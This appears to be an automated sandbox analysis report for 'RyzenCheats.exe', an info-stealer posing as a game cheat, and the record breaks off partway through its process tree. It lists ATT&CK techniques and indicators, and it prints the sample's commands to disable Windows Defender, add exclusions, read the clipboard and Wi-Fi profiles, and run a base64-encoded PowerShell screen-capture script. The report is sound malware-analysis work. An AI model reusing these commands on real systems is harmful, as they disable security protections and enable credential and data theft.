545f156d03870077adfe4d24b7464edbaa85ce6d682bb1a96e668761c478dfc0

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
24-11-2024 16:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

RyzenCheats.exe
Size

6.8MB
MD5

1e8aa3040cfe04f61dd80d6085fbe0ae
SHA1

9a0cfa008db1c20635120c38f2f4303c8db370f3
SHA256

545f156d03870077adfe4d24b7464edbaa85ce6d682bb1a96e668761c478dfc0
SHA512

58a01b076c149650fb6230b1d64d1c095d8b3d79b2c56d5c9b57d40db3a14105f3d9fdece6c05b08f4322fc80ea90d7bcdaae25b9cafcafb1939edc938bed5c2
SSDEEP

98304:b0zdbM+Q2y+aq0NsjOjFgFQlwq4Mjk+dBZtu9xTtwz/aer6/BbCEJ1nL2hBnLnC6:bif0gOjmFQR4MVGFtwLPsnL2hVp3

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4196	powershell.exe
4132	powershell.exe
3584	powershell.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
4552	cmd.exe
2168	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
1700	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
184	RyzenCheats.exe
184	RyzenCheats.exe
184	RyzenCheats.exe
184	RyzenCheats.exe
184	RyzenCheats.exe
184	RyzenCheats.exe
184	RyzenCheats.exe
184	RyzenCheats.exe
184	RyzenCheats.exe
184	RyzenCheats.exe
184	RyzenCheats.exe
184	RyzenCheats.exe
184	RyzenCheats.exe
184	RyzenCheats.exe
184	RyzenCheats.exe
184	RyzenCheats.exe
184	RyzenCheats.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
19	discord.com
18	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
16	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 3 IoCs

discovery

Process Discovery

T1057

pid	Process
5016	tasklist.exe
4180	tasklist.exe
3508	tasklist.exe

UPX packed file 60 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000023ca4-21.dat	upx
behavioral2/memory/184-25-0x00007FFAE3120000-0x00007FFAE3709000-memory.dmp	upx
behavioral2/files/0x0007000000023c97-27.dat	upx
behavioral2/files/0x0007000000023ca2-29.dat	upx
behavioral2/memory/184-30-0x00007FFAF30B0000-0x00007FFAF30D3000-memory.dmp	upx
behavioral2/files/0x0007000000023ca3-34.dat	upx
behavioral2/files/0x0007000000023ca1-33.dat	upx
behavioral2/memory/184-48-0x00007FFAFB0D0000-0x00007FFAFB0DF000-memory.dmp	upx
behavioral2/files/0x0007000000023c9e-47.dat	upx
behavioral2/files/0x0007000000023c9d-46.dat	upx
behavioral2/files/0x0007000000023c9c-45.dat	upx
behavioral2/files/0x0007000000023c9b-44.dat	upx
behavioral2/files/0x0007000000023c9a-43.dat	upx
behavioral2/files/0x0007000000023c99-42.dat	upx
behavioral2/files/0x0007000000023c98-41.dat	upx
behavioral2/files/0x0007000000023c96-40.dat	upx
behavioral2/files/0x0007000000023ca9-39.dat	upx
behavioral2/files/0x0007000000023ca8-38.dat	upx
behavioral2/files/0x0007000000023ca7-37.dat	upx
behavioral2/memory/184-54-0x00007FFAF2780000-0x00007FFAF27AD000-memory.dmp	upx
behavioral2/memory/184-56-0x00007FFAFA0C0000-0x00007FFAFA0D9000-memory.dmp	upx
behavioral2/memory/184-58-0x00007FFAF2750000-0x00007FFAF2773000-memory.dmp	upx
behavioral2/memory/184-60-0x00007FFAF1F50000-0x00007FFAF20C0000-memory.dmp	upx
behavioral2/memory/184-62-0x00007FFAF8490000-0x00007FFAF84A9000-memory.dmp	upx
behavioral2/memory/184-64-0x00007FFAF76B0000-0x00007FFAF76BD000-memory.dmp	upx
behavioral2/memory/184-66-0x00007FFAF2580000-0x00007FFAF25AE000-memory.dmp	upx
behavioral2/memory/184-71-0x00007FFAEDC90000-0x00007FFAEDD48000-memory.dmp	upx
behavioral2/memory/184-74-0x00007FFAF30B0000-0x00007FFAF30D3000-memory.dmp	upx
behavioral2/memory/184-73-0x00007FFAE2DA0000-0x00007FFAE3119000-memory.dmp	upx
behavioral2/memory/184-70-0x00007FFAE3120000-0x00007FFAE3709000-memory.dmp	upx
behavioral2/memory/184-76-0x00007FFAF74F0000-0x00007FFAF7504000-memory.dmp	upx
behavioral2/memory/184-79-0x00007FFAF6920000-0x00007FFAF692D000-memory.dmp	upx
behavioral2/memory/184-78-0x00007FFAF2780000-0x00007FFAF27AD000-memory.dmp	upx
behavioral2/memory/184-81-0x00007FFAFA0C0000-0x00007FFAFA0D9000-memory.dmp	upx
behavioral2/memory/184-82-0x00007FFAE2C80000-0x00007FFAE2D9C000-memory.dmp	upx
behavioral2/memory/184-107-0x00007FFAF2750000-0x00007FFAF2773000-memory.dmp	upx
behavioral2/memory/184-108-0x00007FFAF1F50000-0x00007FFAF20C0000-memory.dmp	upx
behavioral2/memory/184-109-0x00007FFAF8490000-0x00007FFAF84A9000-memory.dmp	upx
behavioral2/memory/184-187-0x00007FFAF2580000-0x00007FFAF25AE000-memory.dmp	upx
behavioral2/memory/184-188-0x00007FFAEDC90000-0x00007FFAEDD48000-memory.dmp	upx
behavioral2/memory/184-206-0x00007FFAE2DA0000-0x00007FFAE3119000-memory.dmp	upx
behavioral2/memory/184-223-0x00007FFAF1F50000-0x00007FFAF20C0000-memory.dmp	upx
behavioral2/memory/184-232-0x00007FFAF74F0000-0x00007FFAF7504000-memory.dmp	upx
behavioral2/memory/184-217-0x00007FFAE3120000-0x00007FFAE3709000-memory.dmp	upx
behavioral2/memory/184-218-0x00007FFAF30B0000-0x00007FFAF30D3000-memory.dmp	upx
behavioral2/memory/184-260-0x00007FFAE2DA0000-0x00007FFAE3119000-memory.dmp	upx
behavioral2/memory/184-265-0x00007FFAF2750000-0x00007FFAF2773000-memory.dmp	upx
behavioral2/memory/184-273-0x00007FFAE2C80000-0x00007FFAE2D9C000-memory.dmp	upx
behavioral2/memory/184-272-0x00007FFAF6920000-0x00007FFAF692D000-memory.dmp	upx
behavioral2/memory/184-271-0x00007FFAF74F0000-0x00007FFAF7504000-memory.dmp	upx
behavioral2/memory/184-270-0x00007FFAEDC90000-0x00007FFAEDD48000-memory.dmp	upx
behavioral2/memory/184-269-0x00007FFAF2580000-0x00007FFAF25AE000-memory.dmp	upx
behavioral2/memory/184-268-0x00007FFAF76B0000-0x00007FFAF76BD000-memory.dmp	upx
behavioral2/memory/184-267-0x00007FFAF8490000-0x00007FFAF84A9000-memory.dmp	upx
behavioral2/memory/184-266-0x00007FFAF1F50000-0x00007FFAF20C0000-memory.dmp	upx
behavioral2/memory/184-264-0x00007FFAFA0C0000-0x00007FFAFA0D9000-memory.dmp	upx
behavioral2/memory/184-263-0x00007FFAF2780000-0x00007FFAF27AD000-memory.dmp	upx
behavioral2/memory/184-262-0x00007FFAFB0D0000-0x00007FFAFB0DF000-memory.dmp	upx
behavioral2/memory/184-261-0x00007FFAF30B0000-0x00007FFAF30D3000-memory.dmp	upx
behavioral2/memory/184-245-0x00007FFAE3120000-0x00007FFAE3709000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
4852	netsh.exe
1020	cmd.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1176	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
3680	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 14 IoCs

pid	Process
3584	powershell.exe
4132	powershell.exe
3584	powershell.exe
4132	powershell.exe
2168	powershell.exe
2168	powershell.exe
4080	powershell.exe
4080	powershell.exe
4080	powershell.exe
2168	powershell.exe
4196	powershell.exe
4196	powershell.exe
4008	powershell.exe
4008	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3584	powershell.exe
Token: SeDebugPrivilege	4132	powershell.exe
Token: SeDebugPrivilege	5016	tasklist.exe
Token: SeDebugPrivilege	4180	tasklist.exe
Token: SeDebugPrivilege	3508	tasklist.exe
Token: SeIncreaseQuotaPrivilege	4648	WMIC.exe
Token: SeSecurityPrivilege	4648	WMIC.exe
Token: SeTakeOwnershipPrivilege	4648	WMIC.exe
Token: SeLoadDriverPrivilege	4648	WMIC.exe
Token: SeSystemProfilePrivilege	4648	WMIC.exe
Token: SeSystemtimePrivilege	4648	WMIC.exe
Token: SeProfSingleProcessPrivilege	4648	WMIC.exe
Token: SeIncBasePriorityPrivilege	4648	WMIC.exe
Token: SeCreatePagefilePrivilege	4648	WMIC.exe
Token: SeBackupPrivilege	4648	WMIC.exe
Token: SeRestorePrivilege	4648	WMIC.exe
Token: SeShutdownPrivilege	4648	WMIC.exe
Token: SeDebugPrivilege	4648	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4648	WMIC.exe
Token: SeRemoteShutdownPrivilege	4648	WMIC.exe
Token: SeUndockPrivilege	4648	WMIC.exe
Token: SeManageVolumePrivilege	4648	WMIC.exe
Token: 33	4648	WMIC.exe
Token: 34	4648	WMIC.exe
Token: 35	4648	WMIC.exe
Token: 36	4648	WMIC.exe
Token: SeDebugPrivilege	2168	powershell.exe
Token: SeDebugPrivilege	4080	powershell.exe
Token: SeIncreaseQuotaPrivilege	4648	WMIC.exe
Token: SeSecurityPrivilege	4648	WMIC.exe
Token: SeTakeOwnershipPrivilege	4648	WMIC.exe
Token: SeLoadDriverPrivilege	4648	WMIC.exe
Token: SeSystemProfilePrivilege	4648	WMIC.exe
Token: SeSystemtimePrivilege	4648	WMIC.exe
Token: SeProfSingleProcessPrivilege	4648	WMIC.exe
Token: SeIncBasePriorityPrivilege	4648	WMIC.exe
Token: SeCreatePagefilePrivilege	4648	WMIC.exe
Token: SeBackupPrivilege	4648	WMIC.exe
Token: SeRestorePrivilege	4648	WMIC.exe
Token: SeShutdownPrivilege	4648	WMIC.exe
Token: SeDebugPrivilege	4648	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4648	WMIC.exe
Token: SeRemoteShutdownPrivilege	4648	WMIC.exe
Token: SeUndockPrivilege	4648	WMIC.exe
Token: SeManageVolumePrivilege	4648	WMIC.exe
Token: 33	4648	WMIC.exe
Token: 34	4648	WMIC.exe
Token: 35	4648	WMIC.exe
Token: 36	4648	WMIC.exe
Token: SeIncreaseQuotaPrivilege	244	WMIC.exe
Token: SeSecurityPrivilege	244	WMIC.exe
Token: SeTakeOwnershipPrivilege	244	WMIC.exe
Token: SeLoadDriverPrivilege	244	WMIC.exe
Token: SeSystemProfilePrivilege	244	WMIC.exe
Token: SeSystemtimePrivilege	244	WMIC.exe
Token: SeProfSingleProcessPrivilege	244	WMIC.exe
Token: SeIncBasePriorityPrivilege	244	WMIC.exe
Token: SeCreatePagefilePrivilege	244	WMIC.exe
Token: SeBackupPrivilege	244	WMIC.exe
Token: SeRestorePrivilege	244	WMIC.exe
Token: SeShutdownPrivilege	244	WMIC.exe
Token: SeDebugPrivilege	244	WMIC.exe
Token: SeSystemEnvironmentPrivilege	244	WMIC.exe
Token: SeRemoteShutdownPrivilege	244	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3020 wrote to memory of 184	3020	RyzenCheats.exe	83
PID 3020 wrote to memory of 184	3020	RyzenCheats.exe	83
PID 184 wrote to memory of 4324	184	RyzenCheats.exe	84
PID 184 wrote to memory of 4324	184	RyzenCheats.exe	84
PID 184 wrote to memory of 1140	184	RyzenCheats.exe	85
PID 184 wrote to memory of 1140	184	RyzenCheats.exe	85
PID 1140 wrote to memory of 4132	1140	cmd.exe	88
PID 1140 wrote to memory of 4132	1140	cmd.exe	88
PID 4324 wrote to memory of 3584	4324	cmd.exe	89
PID 4324 wrote to memory of 3584	4324	cmd.exe	89
PID 184 wrote to memory of 2112	184	RyzenCheats.exe	91
PID 184 wrote to memory of 2112	184	RyzenCheats.exe	91
PID 184 wrote to memory of 1740	184	RyzenCheats.exe	92
PID 184 wrote to memory of 1740	184	RyzenCheats.exe	92
PID 2112 wrote to memory of 5016	2112	cmd.exe	96
PID 2112 wrote to memory of 5016	2112	cmd.exe	96
PID 1740 wrote to memory of 4180	1740	cmd.exe	95
PID 1740 wrote to memory of 4180	1740	cmd.exe	95
PID 184 wrote to memory of 4140	184	RyzenCheats.exe	98
PID 184 wrote to memory of 4140	184	RyzenCheats.exe	98
PID 184 wrote to memory of 4552	184	RyzenCheats.exe	100
PID 184 wrote to memory of 4552	184	RyzenCheats.exe	100
PID 184 wrote to memory of 724	184	RyzenCheats.exe	101
PID 184 wrote to memory of 724	184	RyzenCheats.exe	101
PID 184 wrote to memory of 1188	184	RyzenCheats.exe	103
PID 184 wrote to memory of 1188	184	RyzenCheats.exe	103
PID 184 wrote to memory of 1020	184	RyzenCheats.exe	105
PID 184 wrote to memory of 1020	184	RyzenCheats.exe	105
PID 184 wrote to memory of 1404	184	RyzenCheats.exe	108
PID 184 wrote to memory of 1404	184	RyzenCheats.exe	108
PID 184 wrote to memory of 3564	184	RyzenCheats.exe	111
PID 184 wrote to memory of 3564	184	RyzenCheats.exe	111
PID 4140 wrote to memory of 4648	4140	cmd.exe	113
PID 4140 wrote to memory of 4648	4140	cmd.exe	113
PID 4552 wrote to memory of 2168	4552	cmd.exe	114
PID 4552 wrote to memory of 2168	4552	cmd.exe	114
PID 724 wrote to memory of 3508	724	cmd.exe	115
PID 724 wrote to memory of 3508	724	cmd.exe	115
PID 1020 wrote to memory of 4852	1020	cmd.exe	116
PID 1020 wrote to memory of 4852	1020	cmd.exe	116
PID 1188 wrote to memory of 4812	1188	cmd.exe	117
PID 1188 wrote to memory of 4812	1188	cmd.exe	117
PID 3564 wrote to memory of 4080	3564	cmd.exe	118
PID 3564 wrote to memory of 4080	3564	cmd.exe	118
PID 1404 wrote to memory of 3680	1404	cmd.exe	119
PID 1404 wrote to memory of 3680	1404	cmd.exe	119
PID 184 wrote to memory of 4504	184	RyzenCheats.exe	120
PID 184 wrote to memory of 4504	184	RyzenCheats.exe	120
PID 4504 wrote to memory of 320	4504	cmd.exe	122
PID 4504 wrote to memory of 320	4504	cmd.exe	122
PID 184 wrote to memory of 1768	184	RyzenCheats.exe	123
PID 184 wrote to memory of 1768	184	RyzenCheats.exe	123
PID 4080 wrote to memory of 404	4080	powershell.exe	125
PID 4080 wrote to memory of 404	4080	powershell.exe	125
PID 1768 wrote to memory of 4068	1768	cmd.exe	126
PID 1768 wrote to memory of 4068	1768	cmd.exe	126
PID 184 wrote to memory of 4088	184	RyzenCheats.exe	127
PID 184 wrote to memory of 4088	184	RyzenCheats.exe	127
PID 4088 wrote to memory of 3884	4088	cmd.exe	129
PID 4088 wrote to memory of 3884	4088	cmd.exe	129
PID 184 wrote to memory of 4652	184	RyzenCheats.exe	130
PID 184 wrote to memory of 4652	184	RyzenCheats.exe	130
PID 404 wrote to memory of 4152	404	csc.exe	132
PID 404 wrote to memory of 4152	404	csc.exe	132

C:\Users\Admin\AppData\Local\Temp\RyzenCheats.exe
"C:\Users\Admin\AppData\Local\Temp\RyzenCheats.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3020
- C:\Users\Admin\AppData\Local\Temp\RyzenCheats.exe
  "C:\Users\Admin\AppData\Local\Temp\RyzenCheats.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:184
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RyzenCheats.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4324
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RyzenCheats.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3584
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1140
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4132
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2112
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:5016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1740
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4180
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4140
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4648
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:4552
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2168
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:724
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3508
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1188
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4812
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    - Suspicious use of WriteProcessMemory
    PID:1020
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:4852
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1404
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:3680
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3564
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
